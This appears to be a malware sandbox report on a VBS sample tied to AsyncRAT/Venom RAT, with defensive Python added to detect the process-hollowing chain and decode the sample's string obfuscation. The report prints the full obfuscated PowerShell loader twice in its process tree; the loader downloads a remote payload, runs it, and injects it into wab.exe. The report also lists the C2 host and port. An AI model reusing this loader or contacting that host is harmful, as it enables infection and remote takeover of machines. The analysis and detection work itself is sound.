Analysis
-
max time kernel
143s -
max time network
145s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system -
submitted
24-05-2024 13:15
Static task
static1
Behavioral task
behavioral1
Sample
255c4ecba922d8b56534bd7a571525c67eb39bbef0f18bc96e414160a95fc2f6.vbs
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
255c4ecba922d8b56534bd7a571525c67eb39bbef0f18bc96e414160a95fc2f6.vbs
Resource
win10v2004-20240426-en
General
-
Target
255c4ecba922d8b56534bd7a571525c67eb39bbef0f18bc96e414160a95fc2f6.vbs
-
Size
897KB
-
MD5
c983e816294b2d4c2213db5bc4339393
-
SHA1
4eb96d15af10865ac93ed29ec475bb8eafe91ea3
-
SHA256
255c4ecba922d8b56534bd7a571525c67eb39bbef0f18bc96e414160a95fc2f6
-
SHA512
fac24fd9947e732069c7a3fdcb91376ace629ace66b1e0f9fb384b9ca03725c7f39b8f817c4bea4593595f30ebb67083fbafaebe61bfc59a3176caddf3aeaecb
-
SSDEEP
12288:qzTzUyR7hSRac+qkLmttaGgMskgqoiMHsp90:UXh+k+taGKqoJO0
Malware Config
Extracted
Family
asyncrat
-
Version
5.0.5
-
Botnet
Venom Clients
-
C2
xvern429.duckdns.org:8890
-
Mutex
Venom_RAT_HVNC_Mutex_Venom RAT_HVNC
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Blocklisted process makes network request 5 IoCs
Processes:
flow  pid   process
3     1976  powershell.exe
5     1976  powershell.exe
7     1976  powershell.exe
9     1976  powershell.exe
11    1976  powershell.exe
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
pid   process
2300  wab.exe
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
pid   process
2820  powershell.exe
2300  wab.exe
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
description                          pid   process         target process
PID 2820 set thread context of 2300  2820  powershell.exe  wab.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
pid   process
1976  powershell.exe
2820  powershell.exe
2820  powershell.exe
-
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
pid   process
2820  powershell.exe
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
description              pid   process
Token: SeDebugPrivilege  1976  powershell.exe
Token: SeDebugPrivilege  2820  powershell.exe
Token: SeDebugPrivilege  2300  wab.exe
-
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
source pid  source process  target pid  target process  occurrences
2436        WScript.exe     1976        powershell.exe  3
1976        powershell.exe  2752        cmd.exe         3
1976        powershell.exe  2820        powershell.exe  4
2820        powershell.exe  2988        cmd.exe         4
2820        powershell.exe  2300        wab.exe         6
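The signature tables above only become a verdict once they are joined to the process tree: WScript.exe spawns the 64-bit PowerShell (which is the process making network requests), that PowerShell re-launches the 32-bit SysWOW64 PowerShell, and the 32-bit PowerShell starts wab.exe with no arguments, writes to its memory six times and resets its thread context. The following correlation logic is an added example and is not part of the sandbox's own tooling; the process and signature records are transcribed by hand from this report (script bodies elided), and the rule names and the `pwsh.exe`/`cscript.exe` generalisations are the example's own.

```python
"""Correlate a sandbox process tree with its injection indicators.

Added example for this report, not part of the sandbox's own tooling. The
records below are transcribed by hand from the report's process tree and from
the SetThreadContext, WriteProcessMemory and network-request signature tables;
the two PowerShell script bodies are elided because only the launch shape
matters for these rules.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int      # 0 marks the root of the tree
    image: str     # image path as the report lists it
    cmdline: str   # command line as the report lists it


# Process tree from the report.
PROCS = [
    Proc(2436, 0, r"C:\Windows\System32\WScript.exe",
         r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\255c4ecba922d8b56534bd7a571525c67eb39bbef0f18bc96e414160a95fc2f6.vbs"'),
    Proc(1976, 2436, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Guttiferae = 1;..."'),
    Proc(2752, 1976, r"C:\Windows\system32\cmd.exe",
         r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Absterge.Pig && echo t"'),
    Proc(2820, 1976, r"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe",
         r'"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Guttiferae = 1;..."'),
    Proc(2988, 2820, r"C:\Windows\SysWOW64\cmd.exe",
         r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Absterge.Pig && echo t"'),
    Proc(2300, 2820, r"C:\Program Files (x86)\windows mail\wab.exe",
         r'"C:\Program Files (x86)\windows mail\wab.exe"'),
]

# Signature tables from the report, keyed by (source pid, target pid).
SET_THREAD_CONTEXT = {(2820, 2300)}
WRITE_PROCESS_MEMORY = {(2436, 1976): 3, (1976, 2752): 3, (1976, 2820): 4,
                        (2820, 2988): 4, (2820, 2300): 6}
NETWORK_REQUEST_PIDS = {1976}

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}     # cscript added by this example
POWERSHELL = {"powershell.exe", "pwsh.exe"}       # pwsh added by this example


def image_name(path):
    """Lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(pid, procs):
    """Root-to-leaf list of PIDs ending at `pid`."""
    by_pid = {p.pid: p for p in procs}
    chain = []
    while pid in by_pid:
        chain.append(pid)
        pid = by_pid[pid].ppid
    chain.reverse()
    return chain


def analyze(procs, thread_ctx, wpm, net_pids):
    """Return the PIDs that match each rule, in tree order."""
    by_pid = {p.pid: p for p in procs}
    hits = {"script_host_to_powershell": [], "download_cradle": [],
            "powershell_to_wow64_powershell": [], "hollowed_child": []}
    for p in procs:
        parent = by_pid.get(p.ppid)
        if parent is None:
            continue
        me, par = image_name(p.image), image_name(parent.image)
        # 1. A script host launching PowerShell; if that PowerShell also made
        #    network requests it is the download stage.
        if me in POWERSHELL and par in SCRIPT_HOSTS:
            hits["script_host_to_powershell"].append(p.pid)
            if p.pid in net_pids:
                hits["download_cradle"].append(p.pid)
        # 2. 64-bit PowerShell re-launching the 32-bit (SysWOW64) PowerShell,
        #    which is needed before injecting into a 32-bit host such as wab.exe.
        if me in POWERSHELL and par in POWERSHELL and "\\syswow64\\" in p.image.lower():
            hits["powershell_to_wow64_powershell"].append(p.pid)
        # 3. A child started with no arguments whose parent then wrote its
        #    memory and reset its thread context: the shape of process hollowing.
        bare = p.cmdline.strip().strip('"').lower() == p.image.lower()
        injected = (parent.pid, p.pid) in thread_ctx and wpm.get((parent.pid, p.pid), 0) > 0
        if par in POWERSHELL and bare and injected:
            hits["hollowed_child"].append(p.pid)
    return hits


if __name__ == "__main__":
    result = analyze(PROCS, SET_THREAD_CONTEXT, WRITE_PROCESS_MEMORY, NETWORK_REQUEST_PIDS)
    for rule, pids in result.items():
        print(f"{rule:32} {pids}")
    print("chain to wab.exe:", " -> ".join(map(str, ancestry(2300, PROCS))))
```

Run against the report's data the rules fire on PID 1976 (script host to PowerShell, with network activity), PID 2820 (the WoW64 re-launch) and PID 2300 (wab.exe hollowed by its PowerShell parent); the same predicates map directly onto Sysmon event ID 1, 8 and 10 fields if you want to turn them into a live detection.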
Processes
-
C:\Windows\System32\WScript.exe (depth 1)
Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\255c4ecba922d8b56534bd7a571525c67eb39bbef0f18bc96e414160a95fc2f6.vbs"
- Suspicious use of WriteProcessMemory
PID: 2436 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Guttiferae = 1;$Benzinen='Sub';$Benzinen+='strin';$Benzinen+='g';Function Sikkerhedspolitikken($Datamatiserede){$Lemviger=$Datamatiserede.Length-$Guttiferae;For($concocting=5;$concocting -lt $Lemviger;$concocting+=6){$Afbinder100+=$Datamatiserede.$Benzinen.Invoke( $concocting, $Guttiferae);}$Afbinder100;}function natasjas($Svirres){. ($Resultanternes) ($Svirres);}$Allehelgensdag=Sikkerhedspolitikken 'DrikkMLet.ioHospiz,ionoiAfstaljugoslRytmeaVedli/ Till5 Omkl.Utril0Safia Polyn(kapitWLo enigi.dan Aer.d Ideao.ideewKurtisManda PacifN ThioTIndus Regar1Conje0T pir.U,sen0P ric;Vadef gamenWSpeediChronnbanne6Super4Flutt;.loug Gr.mexsamme6 Untr4Trypa;Sorge Myrfor,uligv.karn:Tinwo1Vivif2Her,k1Konst. .hor0Durga),ncon DispuGFrugte Dvnlcra kskEksp.oSamle/Bajon2Pedic0Cytoc1 Irre0Medie0Arbel1Rnebl0 Disp1Czech ,eviF VasoiNerverErfa.eJoinifColeooSelvbxLille/Allel1Stand2Postf1Short.Mal,s0 esun ';$Haandslagene=Sikkerhedspolitikken 'SlangUdeeknsWeeweeModulr ,uri-WalliAJvni,gUdskeedatofnOver,tTryks ';$Funktionserklringen=Sikkerhedspolitikken 'afterh PlectDeklatTudehp B,ndsSt.sk:Logis/Theo /SpottwOilcuwLabrowB.rac.SkiftsTi.gieFecalnEntadd.nstisPartspSny ta NonecChoulemaler.DretscKo,troKabbemBeevi/Lam hpK,stbr Top,o arta/Re.btdOpposlU,tra/Kon,eiFrox,7 TimetMns rdvoicibAutorrBlokd ';$Abrogators=Sikkerhedspolitikken 'g.lli> Rets ';$Resultanternes=Sikkerhedspolitikken ' La.kiA,laseInsenxTaiwa ';$Almene='Nonconcentration';$Korrektiv = Sikkerhedspolitikken 'Bagloe SkancRnt.ehvarrioBened Desm%Fors.aUn pop.eimppPotand nfuaT.lnrtSprogaAct.r%disen\ comeAKor.lb,pinasBarontsammeeDisp.rWhid,gCla.te A.nd.PlakaPF,skei.dekrgNonvi Straf& Mens&R.itb Barb eUrobicSkrmbhSummaoModta perstFishm ';natasjas (Sikkerhedspolitikken 'Besl,$ubestgkurvel.ostso OutbbBedmma.olytl ndo:KlaptOCincivTukaneR.eebrBrne,lProtooPolypyindleaNdr,nlExtretMes.iySimar7Proje5 Ins.=Signa(UnrefcHaremmVejrldSporu 
Okker/RepeocPligt Stors$A.aniKUnsilo aparrNonrerResereTopatkBlasttDitleiVinkevTorch)Slag, ');natasjas (Sikkerhedspolitikken 'Poten$ BlodgTrlaslPat tospionb tigea letnl Over:O.ienDTvangiDictavHandliBrnehdP,mphi.etaln EthygD,ndelSourby Natt=E.sal$AkutbF SupeuBeve,nFactokSystetSpilli SynuoUntrin jaldsGasleeUproorAfrusk lidelApiolrC.colidancenAcq.ig GlobeThroanDejun.Jord,s T ilpunvenlR ckeiNoneqt Unpo(,agac$I.dgaAKrimibBrndgrPucknoBariug NormaIncomtTndinoInsamrDitrisCount)Rokke ');$Funktionserklringen=$Dividingly[0];$Forfodssnkningers= (Sikkerhedspolitikken ' Sigh$VidnegA.giolBatteoDelngbMe.asaLigeslSydaf: Ca aCre iga AftebLe.anlSpeeceP olamKark,eThyronAnlgs=MuscaNYeanceMesmew Dups-LyefyO UnshbKillojAk,ivevoldtcDobbetM.uth StrukSlucilySk ersConvit ConjeStatsmFo.et. CausNPolyee Al,mtHo.se. InveWSpilleStnk bAnimeCProtel SlgtiCcilie.uancnKvldct');$Forfodssnkningers+=$Overloyalty75[1];natasjas ($Forfodssnkningers);natasjas (Sikkerhedspolitikken 'Samle$ F.rnCStr baVitribC.ppil.culkeOrganmL troeUn.annNo cu.RelenHFrsn,eKrediaRylerdOver,eD,skerechoisTernr[Spec.$BlaabH MolmaKnib.a lhenChi.kdCo,mosUndd lCathea Pigeg levaeRe.nfnsa vne.eade]Inapp=level$ In oA CykelIndgrlDr,cueCrow.hPl,aseforudl GylpgNonreeP incnColo.svenend Hemia Int g Korr ');$Fyldigstes3=Sikkerhedspolitikken 'U,ern$Skg,sC PresaPtyalbProb l,repoepreshm ,iale amornBott . StaaDHepato HandwElefan Rel,lPlotxoNomadaCu,tod reorFL.sseiKrestlAggreeFakto(Mascu$OsphrFHjp,luCremenCasinkMilittBaskeiFangeoStartnUv shsFlagde sandrGrafikIndh,lnephrrDi.tai,isaun SamagPracteSmu.tn Iglu,Vider$Okaf.UOversnSubsidSpi,de ud,vrVarmesSt pfgPoundtTtesaeHoorasBrief)Aram, ';$Undersgtes=$Overloyalty75[0];natasjas (Sikkerhedspolitikken 'Nymph$BalkagStudelHexago F,jlbPunicaI.deslM.rke: PallCM,reraConneb hichb,nacqi ,andeC chv=Rheg,(TestaTOm.tdegaelns .tratkikr -BolerPForbjaNon,etTwoneh Paa, Kasse$SlidsUDoundnZeugodthreneNereirKompasLubecgPostptTilreeCalipsLaan.) 
Misd ');while (!$Cabbie) {natasjas (Sikkerhedspolitikken 'Enami$HumorgRhynilBl.dhoElimib jernagevrelFremm:Filmiu.ersldIod,tluncurbFou.teLnrelrKhap,eLejetsS mio=Toil $ AptitKlamprParolu.orpheHande ') ;natasjas $Fyldigstes3;natasjas (Sikkerhedspolitikken 'TildkS UncutPrinta UkonrHittet ati-RegioS SprolThesoePor.eepseudpColor Polym4Trstu ');natasjas (Sikkerhedspolitikken ' Unde$Lyreng Sto.lDeklaoUdefibTelesaVederlRosem: BuskCFormuaFo lbb S.ltbGeo iiLivseeSphyg=Fedts(EmmerT La,deLie osCleartVognm-S,lonPAfleda GuldtBrugshfamil Smask$OxideUSpec.nPlowmd S erePorosrAnodisBeskjgKogeptJ.suieAfmejsCoesi)Farve ') ;natasjas (Sikkerhedspolitikken 'B,squ$ a xegfilmkl Unspo Mor,bMyeloaAfhngl Djae:RepliSTaksetWrinkrBreddiRuddevSignaySn,rr=Rachi$E,trag sp.ol CommoTermibDgnbeamaximlU.ius:AntincAnkeruKvotadPam ldI dorl AteleValgrs Stipo,alesm gu.ue .ort+Trill+Bulle%Dusse$BonzeDOr.ani Wh,svVerani dsstdharmeiBredsnNicolg Comil En,oygeo.a.Fler.c ikto Brdfu,punknEl.xetOutst ') ;$Funktionserklringen=$Dividingly[$Strivy];}$Dustpan=301913;$Eyl=29401;natasjas (Sikkerhedspolitikken 'Snkek$Voldgg Overl ootloSindsbT llaaUnt,ulPhosp: D.plOB.illv Overe,ectirGeik eUop.rdAb,oa ,rott=Ine,p S.ejGg vineKlodstIn.er-MelliCDubbioturannmillit SpraeLyttenFuldttTaxas M,nom$StranUba,rnnBrugsdLon ie,nexarLemlssPh.togBair tOpr.ae StamsAncyl ');natasjas (Sikkerhedspolitikken 'Dehyd$Stu.ag OverlImbeco regrbPicasa Vicel F,gs:AmpliNSgangoTe.ran,iarra DecodBurb,hDi see Ve dsMarikiFarv v A.ideUnsallKr egyCeli. 
Endol= Egen Tilsk[ ToniSBoatlyEja usG lintOffloeK,rnam Skaf.FlerdCVandroKa,itnFordmvUndereLevnirVocimt.rott]W oli:F mvr:RitheF PortrBefleo Agelm Re.oBWi,dla OversParaleFrie,6R,cur4SuperSSlagtt ModsrAnticicytobnStyrbgTypog(Excys$PicofOIs,gov .ateeHealsr.ildeevrdikd,mdbn) dtyn ');natasjas (Sikkerhedspolitikken ' Chr $FinlngNontelAflivo.affebdiag,aNonaglrhod.:BegumS rudtiIhidigRingmnKinksapolyptB.dtiu Arc.rDowief visoApolorS.artkSide lEndotaFiskerRipariStivsn.uksug aijaeForspn P.lv crev,= Udgr Flan[ prelS tenbyUndersKis,etunstreAma.emLay o.PhyllTdemoneadelsxKonsttUdtrr.Fla.nEP.rvenUdvalc,hrusohalocd Br.li RedonBonnegAnsva]lidia:Notes:.thnoAtheurSBev dC RediI SkydI.ouga. AngiGPalm e Win.tMaskiSBloustErgotrDe.enirinnenConsugFdse ( Chol$Nedt.NReklao alponPhotiaF ypadpi.cph radie flyvsIlysaiW ippvS.stee BestlB,oksyGr,nd)Time, ');natasjas (Sikkerhedspolitikken 'Staal$ BitrgRe.eclDa skoPos,tb ereaaMon.tlAlgo,:B skvSUn.evp Pre i onjrUnbelop,oacimet.ldRivet=Rge.i$BiarcSM,ridiCo.nigEsse,nStandaSaltpt InteuChiv,r BedrfVelkooKil irNyhe kStu il Overa adoirm emoiorthon UrocgNonhyeKnol nSu.li.UidensNoncouUnsucbPalmisSkibstNavnerDaskeiEnkelnSammegHyp,i(B.wra$MisogDNon.auexogesAzocytClickpUnwaraLouisnDrmme,.ryst$PhotoEImmo.y Str.l Neds)Revis ');natasjas $Spiroid;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\system32\cmd.exe (depth 3)
Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Absterge.Pig && echo t"
PID: 2752
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Guttiferae = 1;$Benzinen='Sub';$Benzinen+='strin';$Benzinen+='g';Function Sikkerhedspolitikken($Datamatiserede){$Lemviger=$Datamatiserede.Length-$Guttiferae;For($concocting=5;$concocting -lt $Lemviger;$concocting+=6){$Afbinder100+=$Datamatiserede.$Benzinen.Invoke( $concocting, $Guttiferae);}$Afbinder100;}function natasjas($Svirres){. ($Resultanternes) ($Svirres);}$Allehelgensdag=Sikkerhedspolitikken 'DrikkMLet.ioHospiz,ionoiAfstaljugoslRytmeaVedli/ Till5 Omkl.Utril0Safia Polyn(kapitWLo enigi.dan Aer.d Ideao.ideewKurtisManda PacifN ThioTIndus Regar1Conje0T pir.U,sen0P ric;Vadef gamenWSpeediChronnbanne6Super4Flutt;.loug Gr.mexsamme6 Untr4Trypa;Sorge Myrfor,uligv.karn:Tinwo1Vivif2Her,k1Konst. .hor0Durga),ncon DispuGFrugte Dvnlcra kskEksp.oSamle/Bajon2Pedic0Cytoc1 Irre0Medie0Arbel1Rnebl0 Disp1Czech ,eviF VasoiNerverErfa.eJoinifColeooSelvbxLille/Allel1Stand2Postf1Short.Mal,s0 esun ';$Haandslagene=Sikkerhedspolitikken 'SlangUdeeknsWeeweeModulr ,uri-WalliAJvni,gUdskeedatofnOver,tTryks ';$Funktionserklringen=Sikkerhedspolitikken 'afterh PlectDeklatTudehp B,ndsSt.sk:Logis/Theo /SpottwOilcuwLabrowB.rac.SkiftsTi.gieFecalnEntadd.nstisPartspSny ta NonecChoulemaler.DretscKo,troKabbemBeevi/Lam hpK,stbr Top,o arta/Re.btdOpposlU,tra/Kon,eiFrox,7 TimetMns rdvoicibAutorrBlokd ';$Abrogators=Sikkerhedspolitikken 'g.lli> Rets ';$Resultanternes=Sikkerhedspolitikken ' La.kiA,laseInsenxTaiwa ';$Almene='Nonconcentration';$Korrektiv = Sikkerhedspolitikken 'Bagloe SkancRnt.ehvarrioBened Desm%Fors.aUn pop.eimppPotand nfuaT.lnrtSprogaAct.r%disen\ comeAKor.lb,pinasBarontsammeeDisp.rWhid,gCla.te A.nd.PlakaPF,skei.dekrgNonvi Straf& Mens&R.itb Barb eUrobicSkrmbhSummaoModta perstFishm ';natasjas (Sikkerhedspolitikken 'Besl,$ubestgkurvel.ostso OutbbBedmma.olytl ndo:KlaptOCincivTukaneR.eebrBrne,lProtooPolypyindleaNdr,nlExtretMes.iySimar7Proje5 Ins.=Signa(UnrefcHaremmVejrldSporu 
Okker/RepeocPligt Stors$A.aniKUnsilo aparrNonrerResereTopatkBlasttDitleiVinkevTorch)Slag, ');natasjas (Sikkerhedspolitikken 'Poten$ BlodgTrlaslPat tospionb tigea letnl Over:O.ienDTvangiDictavHandliBrnehdP,mphi.etaln EthygD,ndelSourby Natt=E.sal$AkutbF SupeuBeve,nFactokSystetSpilli SynuoUntrin jaldsGasleeUproorAfrusk lidelApiolrC.colidancenAcq.ig GlobeThroanDejun.Jord,s T ilpunvenlR ckeiNoneqt Unpo(,agac$I.dgaAKrimibBrndgrPucknoBariug NormaIncomtTndinoInsamrDitrisCount)Rokke ');$Funktionserklringen=$Dividingly[0];$Forfodssnkningers= (Sikkerhedspolitikken ' Sigh$VidnegA.giolBatteoDelngbMe.asaLigeslSydaf: Ca aCre iga AftebLe.anlSpeeceP olamKark,eThyronAnlgs=MuscaNYeanceMesmew Dups-LyefyO UnshbKillojAk,ivevoldtcDobbetM.uth StrukSlucilySk ersConvit ConjeStatsmFo.et. CausNPolyee Al,mtHo.se. InveWSpilleStnk bAnimeCProtel SlgtiCcilie.uancnKvldct');$Forfodssnkningers+=$Overloyalty75[1];natasjas ($Forfodssnkningers);natasjas (Sikkerhedspolitikken 'Samle$ F.rnCStr baVitribC.ppil.culkeOrganmL troeUn.annNo cu.RelenHFrsn,eKrediaRylerdOver,eD,skerechoisTernr[Spec.$BlaabH MolmaKnib.a lhenChi.kdCo,mosUndd lCathea Pigeg levaeRe.nfnsa vne.eade]Inapp=level$ In oA CykelIndgrlDr,cueCrow.hPl,aseforudl GylpgNonreeP incnColo.svenend Hemia Int g Korr ');$Fyldigstes3=Sikkerhedspolitikken 'U,ern$Skg,sC PresaPtyalbProb l,repoepreshm ,iale amornBott . StaaDHepato HandwElefan Rel,lPlotxoNomadaCu,tod reorFL.sseiKrestlAggreeFakto(Mascu$OsphrFHjp,luCremenCasinkMilittBaskeiFangeoStartnUv shsFlagde sandrGrafikIndh,lnephrrDi.tai,isaun SamagPracteSmu.tn Iglu,Vider$Okaf.UOversnSubsidSpi,de ud,vrVarmesSt pfgPoundtTtesaeHoorasBrief)Aram, ';$Undersgtes=$Overloyalty75[0];natasjas (Sikkerhedspolitikken 'Nymph$BalkagStudelHexago F,jlbPunicaI.deslM.rke: PallCM,reraConneb hichb,nacqi ,andeC chv=Rheg,(TestaTOm.tdegaelns .tratkikr -BolerPForbjaNon,etTwoneh Paa, Kasse$SlidsUDoundnZeugodthreneNereirKompasLubecgPostptTilreeCalipsLaan.) 
Misd ');while (!$Cabbie) {natasjas (Sikkerhedspolitikken 'Enami$HumorgRhynilBl.dhoElimib jernagevrelFremm:Filmiu.ersldIod,tluncurbFou.teLnrelrKhap,eLejetsS mio=Toil $ AptitKlamprParolu.orpheHande ') ;natasjas $Fyldigstes3;natasjas (Sikkerhedspolitikken 'TildkS UncutPrinta UkonrHittet ati-RegioS SprolThesoePor.eepseudpColor Polym4Trstu ');natasjas (Sikkerhedspolitikken ' Unde$Lyreng Sto.lDeklaoUdefibTelesaVederlRosem: BuskCFormuaFo lbb S.ltbGeo iiLivseeSphyg=Fedts(EmmerT La,deLie osCleartVognm-S,lonPAfleda GuldtBrugshfamil Smask$OxideUSpec.nPlowmd S erePorosrAnodisBeskjgKogeptJ.suieAfmejsCoesi)Farve ') ;natasjas (Sikkerhedspolitikken 'B,squ$ a xegfilmkl Unspo Mor,bMyeloaAfhngl Djae:RepliSTaksetWrinkrBreddiRuddevSignaySn,rr=Rachi$E,trag sp.ol CommoTermibDgnbeamaximlU.ius:AntincAnkeruKvotadPam ldI dorl AteleValgrs Stipo,alesm gu.ue .ort+Trill+Bulle%Dusse$BonzeDOr.ani Wh,svVerani dsstdharmeiBredsnNicolg Comil En,oygeo.a.Fler.c ikto Brdfu,punknEl.xetOutst ') ;$Funktionserklringen=$Dividingly[$Strivy];}$Dustpan=301913;$Eyl=29401;natasjas (Sikkerhedspolitikken 'Snkek$Voldgg Overl ootloSindsbT llaaUnt,ulPhosp: D.plOB.illv Overe,ectirGeik eUop.rdAb,oa ,rott=Ine,p S.ejGg vineKlodstIn.er-MelliCDubbioturannmillit SpraeLyttenFuldttTaxas M,nom$StranUba,rnnBrugsdLon ie,nexarLemlssPh.togBair tOpr.ae StamsAncyl ');natasjas (Sikkerhedspolitikken 'Dehyd$Stu.ag OverlImbeco regrbPicasa Vicel F,gs:AmpliNSgangoTe.ran,iarra DecodBurb,hDi see Ve dsMarikiFarv v A.ideUnsallKr egyCeli. 
Endol= Egen Tilsk[ ToniSBoatlyEja usG lintOffloeK,rnam Skaf.FlerdCVandroKa,itnFordmvUndereLevnirVocimt.rott]W oli:F mvr:RitheF PortrBefleo Agelm Re.oBWi,dla OversParaleFrie,6R,cur4SuperSSlagtt ModsrAnticicytobnStyrbgTypog(Excys$PicofOIs,gov .ateeHealsr.ildeevrdikd,mdbn) dtyn ');natasjas (Sikkerhedspolitikken ' Chr $FinlngNontelAflivo.affebdiag,aNonaglrhod.:BegumS rudtiIhidigRingmnKinksapolyptB.dtiu Arc.rDowief visoApolorS.artkSide lEndotaFiskerRipariStivsn.uksug aijaeForspn P.lv crev,= Udgr Flan[ prelS tenbyUndersKis,etunstreAma.emLay o.PhyllTdemoneadelsxKonsttUdtrr.Fla.nEP.rvenUdvalc,hrusohalocd Br.li RedonBonnegAnsva]lidia:Notes:.thnoAtheurSBev dC RediI SkydI.ouga. AngiGPalm e Win.tMaskiSBloustErgotrDe.enirinnenConsugFdse ( Chol$Nedt.NReklao alponPhotiaF ypadpi.cph radie flyvsIlysaiW ippvS.stee BestlB,oksyGr,nd)Time, ');natasjas (Sikkerhedspolitikken 'Staal$ BitrgRe.eclDa skoPos,tb ereaaMon.tlAlgo,:B skvSUn.evp Pre i onjrUnbelop,oacimet.ldRivet=Rge.i$BiarcSM,ridiCo.nigEsse,nStandaSaltpt InteuChiv,r BedrfVelkooKil irNyhe kStu il Overa adoirm emoiorthon UrocgNonhyeKnol nSu.li.UidensNoncouUnsucbPalmisSkibstNavnerDaskeiEnkelnSammegHyp,i(B.wra$MisogDNon.auexogesAzocytClickpUnwaraLouisnDrmme,.ryst$PhotoEImmo.y Str.l Neds)Revis ');natasjas $Spiroid;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\SysWOW64\cmd.exe (depth 4)
Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Absterge.Pig && echo t"
PID: 2988
(The command line names system32, but the parent is the 32-bit PowerShell, so WoW64 file-system redirection maps that path to the SysWOW64 copy of cmd.exe.)
-
C:\Program Files (x86)\windows mail\wab.exe (depth 4)
Command line: "C:\Program Files (x86)\windows mail\wab.exe"
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID: 2300
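The PowerShell stage in the process tree hides every string behind one helper, Sikkerhedspolitikken, which walks a literal from index 5 up to (but excluding) Length-1 in steps of 6 and keeps one character per step, so five characters of filler precede each real character and one trailing filler character is never read; a second helper, natasjas, dot-sources the decoded text with the command held in $Resultanternes. The decoder below is an added example, not code from the sandbox or the sample. It carries four literals copied from the command line above; the `encode()` routine and its filler alphabet are the example's own, written only to exercise the decoder on known input. Decoding the short literals shows that natasjas wraps `iex`, that $Haandslagene is the header name `User-Agent`, that $Abrogators is the `>` separator used to split the URL list held in $Dividingly, and that $Allehelgensdag is a Firefox user-agent string.

```python
"""Decoder for the string obfuscation used by the PowerShell stage in this report.

Added example, not code from the sandbox or from the sample. The loader's
helper (Sikkerhedspolitikken) keeps blob[5], blob[11], blob[17], ... for every
index below Length-1; natasjas runs the decoded text through the command that
$Resultanternes decodes to.
"""
import random
import string


def decode(blob, start=5, step=6):
    """Mirror of the loader's Substring loop: keep blob[start], blob[start+step],
    ... for every index strictly below len(blob) - 1 (last character unread)."""
    return "".join(blob[i] for i in range(start, len(blob) - 1, step))


def encode(plain, seed=0):
    """Inverse transform, written here to exercise the decoder on known input:
    five filler characters before each real character and one filler at the end.
    The filler alphabet is this example's assumption; the sample uses fragments
    of Danish and English dictionary words instead."""
    rng = random.Random(seed)
    filler = string.ascii_letters + " .,"
    pieces = ["".join(rng.choice(filler) for _ in range(5)) + c for c in plain]
    pieces.append(rng.choice(filler))
    return "".join(pieces)


# Literals copied verbatim from the report's PowerShell command line.
REPORT_LITERALS = {
    "$Resultanternes": ' La.kiA,laseInsenxTaiwa ',
    "$Haandslagene": 'SlangUdeeknsWeeweeModulr ,uri-WalliAJvni,gUdskeedatofnOver,tTryks ',
    "$Abrogators": 'g.lli> Rets ',
    "$Allehelgensdag": 'DrikkMLet.ioHospiz,ionoiAfstaljugoslRytmeaVedli/ Till5 Omkl.Utril0Safia Polyn(kapitWLo enigi.dan Aer.d Ideao.ideewKurtisManda PacifN ThioTIndus Regar1Conje0T pir.U,sen0P ric;Vadef gamenWSpeediChronnbanne6Super4Flutt;.loug Gr.mexsamme6 Untr4Trypa;Sorge Myrfor,uligv.karn:Tinwo1Vivif2Her,k1Konst. .hor0Durga),ncon DispuGFrugte Dvnlcra kskEksp.oSamle/Bajon2Pedic0Cytoc1 Irre0Medie0Arbel1Rnebl0 Disp1Czech ,eviF VasoiNerverErfa.eJoinifColeooSelvbxLille/Allel1Stand2Postf1Short.Mal,s0 esun ',
}


def decode_report_literals():
    """Decode every literal above; returns {variable name: decoded text}."""
    return {name: decode(blob) for name, blob in REPORT_LITERALS.items()}


if __name__ == "__main__":
    for name, text in decode_report_literals().items():
        print(f"{name:16} -> {text!r}")
    sample = "Invoke-WebRequest -UseBasicParsing"   # constructed round-trip input
    print("round trip ok:", decode(encode(sample)) == sample)
```

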